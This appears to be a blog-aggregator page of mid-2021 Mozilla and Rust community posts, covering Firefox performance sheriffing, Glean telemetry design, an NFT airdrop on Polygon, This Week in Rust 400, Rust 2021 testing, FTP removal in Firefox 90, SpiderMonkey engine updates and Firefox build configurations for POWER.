Welcome to the June 2021 edition of the performance sheriffing newsletter. Here you’ll find the usual summary of our sheriffing efficiency metrics, followed by an update on automated backfills for regressions. If you’re interested (and if you have access) you can view the full dashboard.

Sheriffing efficiency

  • All alerts were triaged in an average of 1.2 days
  • 87% of alerts were triaged within 3 days
  • Valid regressions were associated with bugs in an average of 1.3 days
  • 100% of valid regressions were associated with bugs within 5 days

<figcaption>Sheriffing Efficiency (June 2021)</figcaption>

As mentioned in last month’s newsletter, automated backfills were enabled in April and we had already seen some early signs that this had a positive impact on the time it takes for our sheriffs to raise regression bugs. I’m encouraged to see that this trend has continued into June’s results, and both May and June had 100% of regression bugs raised within 5 days. It is worth noting that the total number of alerts also dropped in June, so it may still be too early to draw any conclusions.

Highlights from H1/2021

Now that we’re over halfway through the year, it’s a perfect time to reflect on the highlights in performance testing so far in 2021.

Visual page load on Desktop

In 2019 we started to add support in our performance tests for using the popular performance tool Browsertime, with a view to eventually replacing our internally developed web extension. Back in February we completed the migration for all of the performance tests that we actively sheriff (we have a handful of tests still using the web extension).

Integrating Browsertime provides us with valuable visual metrics (much closer to user-perceived performance than the navigation timing metrics). It also gives us improved browser support by using WebDriver instead of a web extension (web extensions are not supported on Chrome for Android). You can read more about this work in last month’s newsletter.

Automated backfills

In April we enabled automatic backfills for alerts on Linux and Windows. This means that whenever we generate an alert summary for these platforms, we now automatically trigger the affected tests against additional pushes. This is typically the first thing a sheriff will do when triaging an alert, and whilst it isn’t a time-consuming task, the triggered jobs can take a while to run. By automating this, we increase the chance of our sheriffs having the additional context needed to identify the push that caused the alert at the time of triage.

If successful, automatic backfills should reduce the time between the alert being generated and the regression bug being opened. If you’re interested in following the progress, the sheriffing efficiency is shared each month in this newsletter.

Record/replay sites in mozperftest

In the last few weeks, the team has integrated mozperftest with mozproxy. To better understand this integration, and why it was necessary we first need to provide context for each of these tools.

  • The mozperftest project was created with the intention to replace all existing performance testing frameworks in the mozilla-central source tree with a single one, and make performance tests a standardised, first-class citizen alongside mochitests and xpcshell tests.
  • The mozproxy tool allows you to launch an HTTP proxy to either record all the requests/responses when visiting a website, or to use one of these recordings to simulate visiting a website. This is currently used in Raptor to run our page load tests, eliminating network latency and preventing deployments or service disruptions to these sites from affecting our results.

As mozperftest is already able to run tests using browsertime (like our Raptor harness), the last step remaining to introduce the ability to run our page load tests in mozperftest was integrating the proxy service. This work also simplifies the process of generating recordings, and will allow us to move closer to automating many of these.

PerfDocs improvements

Back in November, Greg Mierzwinski posted about Dynamic Test Documentation with PerfDocs. Since then, development has continued, and I’d like to highlight a few recent improvements. The first is that we now display a more compact view for tests, with details concealed by default. We also provide convenient links for when you need to direct anyone to the documentation for a specific test, in which case we automatically expand to show the full details. These links are also now used in various places where test data is shown, such as Bugzilla, Perfherder, and https://arewefastyet.com/.

<figcaption>PerfDocs example with test details expanded</figcaption>

In addition to this, we have integrated PerfDocs generation with our TaskCluster scheduling. This means that we’re able to quickly answer the question of which platforms and branches tests are running on. An awesome side-effect of this integration is that any change to the scheduling of performance tests will cause the PerfDocs to be updated, and the performance test team will be automatically flagged as reviewers for the patch. This will significantly reduce the risk of unintentionally running (or not running) performance tests on certain platforms. Check out the PerfDocs for the Facebook desktop page load test for an example of this by looking for the Test Task section.

You can visit PerfDocs for our other harnesses by visiting the Performance Testing page. At this time Talos and AWSY are static pages, and were recently migrated from the Mozilla Wiki. Raptor and mozperftest are dynamically generated from the test definitions.

I’d like to highlight that most of the work on PerfDocs has been thanks to Myeongjun Go [:myeongjun], our fantastic volunteer contributor!

Perfherder improvements

There have been a lot of improvements to Perfherder, which is used to visualise performance data and manage alerts when regressions are detected. See What’s new in Perfherder? for details of the latest updates, including many from this year.

Summary of alerts

Each month I’ll highlight the regressions and improvements found.

Note that whilst I usually allow one week to pass before generating the report, there are still alerts under investigation for the period covered in this article. This means that whilst I believe these metrics to be accurate at the time of writing, some of them may change over time.

I would love to hear your feedback on this article, the queries, the dashboard, or anything else related to performance sheriffing or performance testing. You can comment here, or find the team on Matrix in #perftest or #perfsheriffs.

The dashboard for June can be found here (for those with access).

Data@MozillaThis Week in Glean: Firefox Telemetry is to Glean as C++ is to Rust

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean. You can find an index of all TWiG posts online.)

I had this goofy idea that, like Rust, the Glean SDKs (and Ecosystem) aim to bring safety and higher-level thought to their domain. This is in comparison to how, like C++, Firefox Telemetry is built out of flexible primitives that assume you very much know what you’re doing and cannot (will not?) provide any clues in its design as to how to do things properly.

I have these goofy thoughts a lot. I’m a goofy guy. But the more I thought about it, the more the comparison seemed apt.

In Glean wherever we can we intentionally forbid behaviour we cannot guarantee is safe (e.g. we forbid non-commutative operations in FOG IPC, we forbid decrementing counters). And in situations where we need to permit perhaps-unsafe data practices, we do it in tightly-scoped areas that are identified as unsafe (e.g. if a timing_distribution uses accumulate_raw_samples_nanos you know to look at its data with more skepticism).

In Glean we encourage instrumentors to think at a higher level (e.g. memory_distribution instead of a Histogram of unknown buckets and samples), thereby permitting Glean to identify errors early (e.g. you can’t start a timespan twice) and allowing Glean to do clever things with that information (e.g. in our tooling we know counter metrics are interesting when summed, but quantity metrics are not). Speaking of those errors, we are able to forbid error-prone behaviour through design and use of language features (e.g. in languages with type systems we can prevent you from collecting the wrong type of data), and when the error is only detectable at runtime we can report it with a high degree of specificity to make it easier to diagnose.
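To sketch that design principle in code (hypothetical types, not Glean’s actual API): a counter that only exposes an add operation makes decrementing unrepresentable, and non-positive amounts get recorded as errors rather than silently accepted:

```rust
/// Hypothetical counter metric; deliberately no `subtract` or `set`,
/// so decrementing is unrepresentable by design.
pub struct Counter {
    value: u64,
    errors: u64, // invalid recordings are counted, not silently dropped
}

impl Counter {
    pub fn new() -> Self {
        Counter { value: 0, errors: 0 }
    }

    /// A non-positive amount is only detectable at runtime, so it is
    /// reported as a recording error instead of corrupting the value.
    pub fn add(&mut self, amount: i32) {
        if amount <= 0 {
            self.errors += 1;
            return;
        }
        self.value += amount as u64;
    }
}

fn main() {
    let mut clicks = Counter::new();
    clicks.add(3);
    clicks.add(-1); // recorded as an error instead of decrementing
    assert_eq!(clicks.value, 3);
    assert_eq!(clicks.errors, 1);
}
```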

There are more analogues, but the metaphor gets strained. (( I mean, I guess a timing_distribution’s `TimerId` is kinda the closest thing to a borrow checker we have? Maybe? )) So I should probably stop here.

Now, those of you paying attention might have already seen this relationship. After all, as we all know, glean-core (which underpins most of the Glean SDKs regardless of language) is actually written in Rust whereas Firefox Telemetry’s core of Histograms, Scalars, and Events is written in C++. Maybe we shouldn’t be too surprised when the language the system is written in happens to be reflected in the top-level design.

But! glean-core was (for a long time) written in Kotlin from stem to stern. So maybe it’s not due to language determinism and is more to do with thoughtful design, careful change processes, and a list of principles we hold to firmly as the number of supported languages and metric types continues to grow.

I certainly don’t know. I’m just goofing around.

:chutten

(( This is a syndicated copy of the original blog post. ))

Mark MayoHow we airdropped 4700 MeebitsDAO “Red Ticket” NFTs

[I’m Mark from block::block; we help build DAO backends and various NFT bits and bobs]

So what happened was that the 6th most rare Meebit was fractionalized into 1M pieces, and 30,000 (3%) of those fragments were graciously donated to MeebitsDAO by Divergence.VC. Kai proposed that a fun way to re-distribute those fractions would be to do a giveaway contest. Earn tickets for a raffle, have a shot at a chunk of a famous Meebit. Cool! There are three different kinds of tickets, but for the first lottery Kai wanted to airdrop a raffle ticket in the form of an NFT — aka the “Red Ticket” — to every current Meebit holder so they could have a chance to win. Hype up the MeebitsDAO and have some fun!

The first question was “cool idea, but how do we not lose our shirts on gas fees minting 4700 NFTs!?”. There’s a bunch of low-gas alternative chains out there now, which, fortunately, we’d played around with quite a bit when we started doing community “Achievement” NFTs (see some here on OpenSea) for MeebitsDAO. Polygon, for the moment at least, had some really compelling advantages for this kind of “badge” NFT where there’s no/limited monetary value in the token:

  • Polygon is 100% Ethereum compatible — same Solidity smart contracts, same metamask, even the same explorer (the etherscan team built polygonscan). Easy!
  • For end users Polygon addresses are the same as their Ethereum addresses. 1:1. Nice!
  • OpenSea natively/automatically displays NFTs from a user’s matching Polygon address in their collection! This was huge, because we knew 99% of wallets we wanted to drop a ticket on wouldn’t otherwise notice activity on a side-chain.
  • Polygon assets can be moved back to Ethereum mainnet by folks if they so desire, which has a nice feeling.

Getting up and running on Polygon is covered elsewhere, and is pretty simple:

  • Add a “custom RPC” network to metamask.
  • Get some fake test MATIC (the native token on the polygon chain) on the “Mumbai” testnet from a faucet and play around.
  • Get some “real” MATIC on mainnet. Fees are super low on Polygon, so you don’t need much for minting, 5 MATIC ($5!) is plenty to mint thousands of NFTs. I swapped Eth for MATIC on 1inch, and then bridged that MATIC to Polygon. There are many other ways of doing it.

For MeebitsDAO, we create our own ERC721 smart contracts and mint from them instead of using a minting service. It gives us more control, and over time we’re building up a repo of code and scripts that gets better and better and is purpose-built to the needs of the MeebitsDAO community. This maybe sounds like a lot of work vs using a site like Cargo, but if you have some Node.js experience, tools like Hardhat make deploying contracts and minting from them approachable.

If you’re new to Ethereum and NFTs, the first thing you need to know is that you first deploy your smart contract to the blockchain, at which point it will get an address, and then you call that smart contract at that address to mint NFT tokens. As you mint the tokens you need to supply a URI that contains the metadata for that particular token (almost everything we think of as “the NFT” — the description, image, etc. — actually lives in the metadata file off-chain). We generate a JSON file for each ticket and upload it to IPFS via a Pinata gateway, and then pin the file with the Pinata SDK. (pinning is the mechanism where you entice IPFS nodes to not discard your files.. ah, IPFS..)
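For illustration, each per-ticket metadata file follows the usual ERC721 metadata shape; a minimal sketch (all values hypothetical) looks something like this:

```json
{
  "name": "MeebitsDAO Red Ticket #42",
  "description": "Raffle ticket for the MeebitsDAO fraction giveaway.",
  "image": "ipfs://<CID-of-the-ticket-image>"
}
```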

Like many projects, we lean on the heavily tested de facto ERC721 contracts published by the OpenZeppelin team:

[Embedded code: the ticket’s ERC721 contract, based on OpenZeppelin’s templates; see the full repo on GitHub.]

The contract maybe looks a little daunting but really all it says is:

  • Be an ERC721 that has metadata in an external URI, and be burnable by an approved address on an access list.
  • The Counters stuff lets the token be capped — i.e. a fixed supply, supplied at contract creation.
  • safeMint/burn/tokenURI/supportedInterface are just boilerplate to allow the above.
  • totalSupply() lets block explorers like etherscan/polygonscan/etc. know what the cap on the token is so they can display it in their UIs.

Once the contract is published, we have a helper script in the hardhat repo that simply reads a CSV file of addresses we want to airdrop the ticket to and calls safeMint() on the contract. Here’s the core loop:

[Embedded code: the safeMint() airdrop loop from the helper script; see the full repo on GitHub.]

Because blockchain calls don’t always finish quickly, or at all, we use a try{} block to wait for each transaction to succeed before moving on to the next ticket, logging success/failure. When we minted the 4689 NFTs it just happened to be on a morning when Polygon was quite busy, so it took a few hours to complete. We had logs of 2 mints that failed, so we just re-ran those to complete the drop.

You can check out the full repo on GitHub, but hopefully this gives you a quick view at the two “bespoke” pieces: the contract and the minting logic.

Our goal is to share as much as we can about what goes on behind the scenes at block::block as we help the MeebitsDAO team launch fun ideas! Let us know if it’s helpful, what’s missing, what’s cool, and what else we could write about that would help shine a light on “DAO Ops”. :)


How we airdropped 4700 MeebitsDAO “Red Ticket” NFTs was originally published in Block::Block on Medium, where people are continuing the conversation by highlighting and responding to this story.

Support.Mozilla.OrgIntroducing Joseph Cuevas

Hey folks,

Please join me in welcoming Joseph Cuevas (Joe) to the Customer Experience team and the broader SUMO family. Joe is going to be working as an Operations Manager, specifically to build a premium customer experience for Mozilla’s current and future paid products.

Here’s a brief introduction from Joe:

Hi everyone! My name is Joe and I am the new User Support Operations Manager joining the Customer Experience Team. I’ll be working with my team to build a premium customer support experience for Mozilla VPN. I’m looking forward to working alongside and getting to know my fellow Mozillians. I just know we’re going to have a great time!

Welcome, Joe!

This Week In RustThis Week in Rust 400

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Issue 400!

We are so happy to have reached issue 400 of This Week in Rust! To mark this occasion, we would like to introduce you to your editors who put these issues together for you every week!

Current Editors

Nell Shamrell-Harrington

Hello everyone! I'm Nell Shamrell-Harrington (nellshamrell on GitHub). I've served as lead editor of This Week in Rust for a little over a year now. Currently, I work as a Principal Engineer at Microsoft, prior to that I was on the Rust team at Mozilla. I also am a member of the Rust Foundation Board of Directors. My greatest joy in editing This Week in Rust is seeing how dedicated Rustaceans are to teaching and passing on what they have learned. We are a community where personal maturity and empathy are as important as technical excellence. When I'm not working, I'm often caring for and playing with my three pet bunnies - Lucy, Leia, and Noah!

Andre Bogus

Greetings, Rustaceans! I'm Andre 'llogiq' Bogus, and I've been editing TWiR since 2016. I currently work with synth, my third job using Rust. I am one of the first clippy maintainers, a mod team member, a Rust bard, and I have several crates to my name. I'm always amused by the quotes you folks suggest, and like being on top of the merged PRs, so I know what's coming in the next Rust versions. Besides Rust, I like making music, biking, skateboarding and spending time with my wife, three kids and cat.

Colton Donnelly

Good morning to all of you fellow Rustaceans! I'm Colton Donnelly (usually under the screen name cdmistman), and I've been editing TWiR since May 2020. I'm currently a co-op working on the Alan programming language, which uses Rust in the runtime - this is the second time I've had an internship using Rust! I've really enjoyed reading all of your Rust blog posts and articles over the past year (and practicing my speed-reading while I'm at it), it's been awesome seeing how much knowledge y'all like to share. When I'm not coding, I'm usually playing games with friends or binge-watching shows.

Past Editors

Thank you so much to all who have edited This Week in Rust over the years!

Thank YOU

And a special thank you to all who have contributed to This Week in Rust and every single one of our subscribers and readers! Here is to many more issues!

Updates from Rust Community

No newsletters or papers this week.

Official
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is dylint, a tool for running Rust lints from dynamic libraries.

Thanks to George Hahn for the suggestion.

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

280 pull requests were merged in the last week

Rust Compiler Performance Triage

A mixed week, with some moderate regressions and moderate improvements. There were some notable PRs specifically oriented around performance enhancements.

Triage done by @pnkfelix. Revision range: 5aff6dd07a562a2cba3c57fc3460a72acb6bef46..5c0ca08c662399c1c864310d1a20867d3ab68027

3 Regressions, 3 Improvements, 3 Mixed; 1 of them in rollups

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
New RFCs

Upcoming Events

Online
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

The Tor Project

Snapview

Luminovo

Clear

ChainSafe

PolarFox Network

CNRS

The Mobility House GmbH

Immunant

Wingback

Anixe

Modeldrive

NZXT

Kollider

Tempus Ex

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

Tip: whenever you wonder if Pin could be the solution, it isn't

@SkiFire13 on the official Rust Discord

Thanks to Kestrer for the self-suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

The Rust Programming Language BlogRust 2021 public testing period

Rust 2021 public testing period

We are happy to announce that the Rust 2021 edition is entering its public testing period. All of the planned features for the edition are now available on nightly builds along with migrations that should move your code from Rust 2018 to Rust 2021. If you'd like to learn more about the changes that are part of Rust 2021, check out the nightly version of the Edition Guide.

Public testing period

As we enter the public testing period, we are encouraging adventurous users to test migrating their crates over to Rust 2021. As always, we expect this to be a largely automated process. The steps to try out the Rust 2021 Edition are as follows (more detailed directions can be found here); a sketch of the resulting Cargo.toml appears after the list:

  1. Install the most recent nightly: rustup update nightly.
  2. Run cargo +nightly fix --edition.
  3. Edit Cargo.toml and place cargo-features = ["edition2021"] at the top (above [package]), and change the edition field to say edition = "2021".
  4. Run cargo +nightly check to verify it now works in the new edition.
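
Putting steps 2 and 3 together, here's a minimal sketch of what a migrated Cargo.toml might look like. The package name and version are placeholders, not from the original post:

cargo-features = ["edition2021"]

[package]
name = "my-crate"    # placeholder
version = "0.1.0"    # placeholder
edition = "2021"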

Note that Rust 2021 is still unstable, so you can expect bugs and other changes! We recommend migrating your crates in a temporary copy of your code rather than on your main branch. If you do encounter problems, or find areas where quality could be improved (missing documentation, confusing error messages, etc.), please file an issue and tell us about it! Thank you!

What comes next

We are targeting stabilization of all of Rust 2021 for Rust 1.56, which will be released on October 21st, 2021. Per the Rust train release model, that means all features and work must land on nightly by September 7th.

The Mozilla BlogDo you own a connected device? Here’s why you should be wary of the Peloton lock issue.

A growing number of us have connected devices in our homes, offices, driveways and even our bodies. The convenience and fun of integrating a device with daily life is real, but there haven’t been nearly enough conversations about who owns that data and how much consumers are letting big companies into their lives in unexpected ways. A current example: Peloton. 

By now, nearly everyone has heard of Peloton exercise bikes, from the viral ad when they first launched to questions about the security on President Biden's bike. Peloton's popularity is largely tied to its design as a connected device with an extensive online community. Peloton also makes treadmills. Tragically, a 6-year-old was recently killed in an accident on one of these treadmills. Due to safety concerns, Peloton issued a recall and added a feature called Tread Lock that requires a four-digit passcode to keep its treadmills from starting up for anyone without authorized access.

Sounds great, right? Here’s the problem. Peloton treadmill users now need that Tread Lock four-digit passcode to unlock their treadmill, and Tread Lock requires a $39 per month Peloton membership. If users cannot unlock their treadmill, they can’t use the machine at all. Peloton is offering the Tread Lock subscription at no cost for three months and says they are working on restoring access to the treadmill without a subscription. However, Peloton has provided no timeframe for restoring the no-subscription access.
Many Peloton users are worried their costly treadmills will turn into expensive towel racks — not something they signed up for when they bought the treadmill.

Use the Privacy Not Included Guide to shop smart for connected devices


Why this matters to you

Even if you don’t own a Peloton, the issue of who owns and controls a connected device after purchase could be coming your way in the near future. As the number of connected devices in homes and offices continues to grow globally, consumers should be on the lookout for increasing conflicts with makers of connected devices. 

Another recent example came up during a heat wave in the U.S. earlier this summer, when power companies in Texas remotely turned up the connected thermostats of customers trying to keep their homes cool. It seems these customers had signed up for an energy-saver program without realizing it gave the power companies the ability to control their smart thermostats; they only found out when their homes got unexpectedly warm while they were trying to stay cool.

Corporations keeping a level of control over the devices you own in your own home without your explicit awareness, because it was buried in fine print that often goes unread, or making you pay extra to use a device you've already paid a lot of money for, is potentially pretty creepy. And it's something we plan to keep an eye on for you in the future.

The post Do you own a connected device? Here’s why you should be wary of the Peloton lock issue. appeared first on The Mozilla Blog.

Hacks.Mozilla.OrgSpring Cleaning MDN: Part 1

As we’re all aware by now, we made some big platform changes at the end of 2020. Whilst the big move has happened, its given us a great opportunity to clear out the cupboards and closets.

Illustration by Daryl Alexsy: a salmon-coloured dinosaur sweeping with a broom

Most notably, MDN now manages its content from a repository on GitHub. Prior to this, the content was stored in a database and edited by logging in to the site and modifying content via an in-page (WYSIWYG) editor, aka 'The Wiki'. Since the big move, MDN accounts no longer serve a purpose for our users: if you want to edit or contribute content, you sign in to GitHub, not MDN.

Because of this, we'll be removing the account functionality and deleting all of the account data from our database. This is consistent with our Lean Data Practices principles and our commitment to user privacy. It's also the perfect opportunity to do this now, as we're moving our database from MySQL to PostgreSQL this week.

Accounts will be disabled on MDN on Thursday, 22nd July.

Don’t worry though – you can still contribute to MDN! That hasn’t changed. All the information on how to help is here in this guide.

The post Spring Cleaning MDN: Part 1 appeared first on Mozilla Hacks - the Web developer blog.

Mozilla Security BlogStopping FTP support in Firefox 90

The File Transfer Protocol (FTP) has long been a convenient file exchange mechanism between computers on a network. While this standard protocol has been supported in all major browsers almost since its inception, it’s by now one of the oldest protocols still in use and suffers from a number of serious security issues.

The biggest security risk is that FTP transfers data in cleartext, allowing attackers to steal, spoof, and even modify the data transmitted. To date, many malware distribution campaigns launch their attacks by compromising FTP servers and downloading malware onto an end user's device using the FTP protocol.

Discontinuing FTP support in Firefox 90

Aligning with our intent to deprecate non-secure HTTP and increase the percentage of secure connections, we, as well as other major web browsers, decided to discontinue support of the FTP protocol.

Removing FTP brings us closer to a fully-secure web, which is on a path to becoming HTTPS-only. Modern automated upgrading mechanisms such as HSTS, or Firefox's HTTPS-Only Mode, automatically upgrade connections to be secure and encrypted, but they do not apply to FTP.

The FTP protocol itself has been disabled by default since version 88, and now the time has come to end an era and discontinue support for this outdated and insecure protocol — Firefox 90 will no longer support the FTP protocol.

If you are a Firefox user, you don’t have to do anything to benefit from this security advancement. As soon as your Firefox auto-updates to version 90, any attempt to launch an attack relying on the insecure FTP protocol will be rendered useless, because Firefox does not support FTP anymore. If you aren’t a Firefox user yet, you can download the latest version here to start benefiting from all the ways that Firefox works to protect you when browsing the web.

The post Stopping FTP support in Firefox 90 appeared first on Mozilla Security Blog.

Spidermonkey Development BlogSpiderMonkey Newsletter (Firefox 90-91)

SpiderMonkey is the JavaScript engine used in Mozilla Firefox. This newsletter gives an overview of the JavaScript and WebAssembly work we’ve done as part of the Firefox 90 and 91 Nightly release cycles.

Firefox/SpiderMonkey 91 will become the next ESR branch and will remain supported over the next year.

👷🏽‍♀️ JS features

  • Support for Private Fields has been enabled by default (Firefox 90).
  • The Ergonomic Brand Checks for Private Fields proposal has been implemented (Firefox 90).
  • Support for the .at() proposal has been enabled by default (Firefox 90).
  • Intl.DateTimeFormat.dayPeriod is now available (Firefox 90).
  • The Error Cause proposal has been implemented (Firefox 91). This is also supported in our DevTools.
  • The Object.hasOwn proposal has been implemented (Firefox 91).
  • Intl.DisplayNames v2 has been implemented (Firefox 91).
  • Intl.DateTimeFormat support for formatRange and formatRangeToParts has been enabled by default (Firefox 91).
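
To give a flavour of a few of these features, here's a minimal sketch (ours, not from the newsletter) combining ergonomic brand checks, Object.hasOwn, and the Error Cause proposal:

class Counter {
  #count = 0;

  // Ergonomic brand check: `#count in obj` tests for the private field
  // without throwing (Firefox 90)
  static isCounter(obj) {
    return #count in obj;
  }
}

console.log(Counter.isCounter(new Counter())); // true
console.log(Counter.isCounter({}));            // false

// Object.hasOwn: a more robust alternative to hasOwnProperty (Firefox 91)
console.log(Object.hasOwn({ a: 1 }, "a")); // true

// Error Cause: attach the original error when rethrowing (Firefox 91)
try {
  throw new Error("low-level failure");
} catch (err) {
  const wrapped = new Error("high-level failure", { cause: err });
  console.log(wrapped.cause === err); // true
}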

🌍 Unified Intl implementation

Work is underway to unify the Intl (Internationalization) code in SpiderMonkey and the rest of Gecko as a shared mozilla::intl component. This results in less code duplication and will make it easier to migrate from the ICU library to ICU4X in the future. The features and behaviour of this code continue to follow the ECMA-402 specification.

Over the past months, number formatting, PluralRules, and DateTimeFormat have been ported to the new mozilla::intl code module.

⚡ WebAssembly

  • We’ve revendored the SIMD test suite with a new translator.
  • More of the Baseline compiler has been templatized to clean up and simplify the code.
  • The Extended Constant Expressions proposal is now supported.
  • More SIMD operations have been optimized.
  • ARM64 codegen has been optimized more.
  • We fixed a performance cliff caused by the LICM optimization pass hoisting too much code out of very large loops.
  • We changed memory length values from bytes to pages to prepare for 64-bit Wasm memory.

🧪 WASI port

Fastly and Igalia have upstreamed an initial WASI port of SpiderMonkey. We’re very excited about bringing our JS engine to new platforms and exploring the future of this technology.

❇️ Stencil

Stencil is our project to create an explicit interface between the frontend (parser, bytecode emitter) and the rest of the VM, decoupling those components. This lets us improve web-browsing performance, simplify a lot of code and improve bytecode caching.

  • We’re now using shared memory to share stencils and bytecode for our self-hosted JS code (builtins implemented in JS) across content processes. This has resulted in significant memory usage and content process startup improvements.
  • To optimize and shrink self-hosted code more, we’ve started work on simplifying self-hosted bindings and certain intrinsics.
  • We’ve added testing functions for compiling to stencil off the main thread, to improve testing and fuzzing.
  • More code in the browser has been converted to the new stencil-based APIs.

📐 ReShape

ReShape is a project to optimize and simplify our object layout and property representation after removing TI. This will help us fix some long-standing issues related to performance, memory usage and code complexity.

  • We’ve converted ShapeTable (hash table for properties) from a custom hash table implementation to mozilla::HashSet. This has let us remove a lot of complicated code and is also faster.
  • After adding better abstractions for property lookups, we moved property information out of Shapes into a new PropMap (property map) data structure. This fixes some performance issues and has reduced JS memory by 5-6% because it allows sharing more information.

🚀 JIT

  • We’ve fixed the Baseline IC code for NewObject to be shareable. These unshared IC stubs used to account for more than 65% of all Baseline IC compilations on certain websites.
  • We’ve added Warp transpiler support for NewObject and NewArray IC stubs.
  • These changes made it possible to optimize JitScript allocation by allocating Baseline IC fallback stubs as fixed size array instead of using a bump allocator. We were also able to shrink and simplify various IC-related data structures.
  • We’ve added code generation based on YAML for MIR instructions, to remove C++ boilerplate code.
  • We removed the old arguments analysis code after switching to a much simpler design in Firefox 89.
  • We’ve optimized polymorphic Object.is more to improve React performance.
  • We added a mechanism to reorder type checks for polymorphic TypeOf and ToBool operations in Warp based on Baseline IC feedback.
  • Contributor Garima hardened the JIT back-ends by forcing the use of RAII patterns for scratch registers.

🧹 Garbage Collection

  • Documentation for the hazard analysis was moved from the wiki to firefox-source-docs.
  • We’ve changed the WeakMap marking algorithm to be much simpler and faster.
  • We’ve added GC counts to performance profiles to help diagnose performance issues.
  • We implemented a new pre-tenuring mechanism for object allocations. We used to have a TI-based implementation, but the new version is a lot more precise and robust.
  • The maximum store buffer size has been increased to avoid triggering nursery GCs too early on websites like Reddit.

📚 Miscellaneous

  • We redesigned our website at https://spidermonkey.dev/ and introduced our new logo.
  • SpiderMonkey can now use an external thread pool for background tasks. This was enabled in Firefox to reduce the number of background threads.
  • PropertyDescriptor (and code using it) has been greatly improved and simplified. It now uses proper encapsulation and enforces important invariants.
  • Storage for private methods has been optimized.
  • We’ve added debugger API support for private fields and methods.
  • We removed the old debugger instrumentation mechanism that was no longer being used.
  • The team did a small sprint to split up the big jsapi.h header file more.
  • We’ve simplified the complicated rope flattening code a lot.
  • We added a new Fuzzilli CI build to help our fuzzing team.
  • We’ve added more embedding APIs for working with BigInt values.
  • We’ve updated irregexp to the latest version.
  • mozilla::Unused is now unused in SpiderMonkey code.
  • Contributor sagu added CI support to the embedding examples repository.

The Talospace ProjectFirefox 90 on POWER (and a JIT progress report)

Firefox 90 is out, offering expanded and improved software WebRender (not really relevant if you've got a supported GPU, as most of us in OpenPOWER land do), an enhanced SmartBlock which ups the arms race with Facebook, and private fields and methods in JavaScript, among other platform updates. FTP is now officially and completely gone (and really should be part of registerProtocolHandler, as Gopher is), but at least you can still use compact layout for tabs.

Unfortunately, a promising OpenPOWER-specific update for Fx90 bombed. Ordinarily I would have noticed this with my periodic smoke-test builds but I've been trying to continue work on the JavaScript JIT in my not-so-copious spare time (more on that in a moment), so I didn't notice this until I built Fx90 and no TLS connection would work (they all abort with SSL_ERROR_BAD_SERVER). I discussed this with Dan Horák and the official Fedora build of Firefox seemed to work just fine, including when I did a local fedpkg build. After a few test builds over the last several days I determined the difference was that the Fedora Firefox package is built with --use-system-nss to use the NSS included with Fedora, so it wasn't using whatever was included with Firefox.

Going to the NSS tree I found bug 1566124, an implementation of AES-GCM acceleration for Power ISA. (Interestingly, I tried to write an implementation of it last year for TenFourFox FPR22 but abandoned it since it would be riskier and not much faster with the more limited facilities on 32-bit PowerPC.) This was, to be blunt, poorly tested and Fedora's NSS maintainer indicated he would disable it in the shipping library. Thus, if you use Fedora's included NSS, it works, and if you use the included version in the Firefox tree (based on NSS 3.66), it won't. The fixes are in NSS 3.67, which is part of Firefox 91; they never landed on Fx90.

The two fixes are small (to security/nss/lib/freebl/ppc-gcm-wrap.c and security/nss/lib/freebl/ppc-gcm.s), so if you're building from source anyway the simplest and highest-performance option is just to include them. (And now that it's working, I do have to tip my hat to the author: the implementation is about 20 times faster.) Alternatively, Fedora 34 builders can still just add --with-system-nss to their .mozconfig as long as you have nspr-devel installed, or a third workaround is to set NSS_DISABLE_PPC_GHASH=1 before starting Firefox, which disables the faulty code at runtime. In Firefox 91 this whole issue should be fixed. I'm glad the patch is done and working, but it never should have been committed in its original state without passing the test suite.
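
For those who'd rather not rebuild at all, the runtime workaround mentioned above boils down to something like this in a shell (assuming firefox is on your PATH):

# disable the faulty accelerated GHASH code at runtime
export NSS_DISABLE_PPC_GHASH=1
firefox &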

Another issue we have a better workaround for is bug 1713968, which causes errors building JavaScript with gcc. The reason that Fedora wasn't having any problem doing so is its rather voluminous generated .mozconfig that, amongst other things, uses -fpermissive. This is a better workaround than minor hacks to the source, so that is now in the .mozconfigs I'm using. I also did a minor tweak to the PGO-LTO patch so that it applies cleanly. With that, here are my current configurations:

Debug

export CC=/usr/bin/gcc
export CXX=/usr/bin/g++

mk_add_options MOZ_MAKE_FLAGS="-j24" # as you like
ac_add_options --enable-application=browser
ac_add_options --enable-optimize="-Og -mcpu=power9 -fpermissive"
ac_add_options --enable-debug
ac_add_options --enable-linker=bfd

export GN=/home/censored/bin/gn # if you have it

PGO-LTO Optimized

export CC=/usr/bin/gcc
export CXX=/usr/bin/g++

mk_add_options MOZ_MAKE_FLAGS="-j24" # as you like
ac_add_options --enable-application=browser
ac_add_options --enable-optimize="-O3 -mcpu=power9 -fpermissive"
ac_add_options --enable-release
ac_add_options --enable-linker=bfd
ac_add_options --enable-lto=full
ac_add_options MOZ_PGO=1

export GN=/home/censored/bin/gn # if you have it
export RUSTC_OPT_LEVEL=2

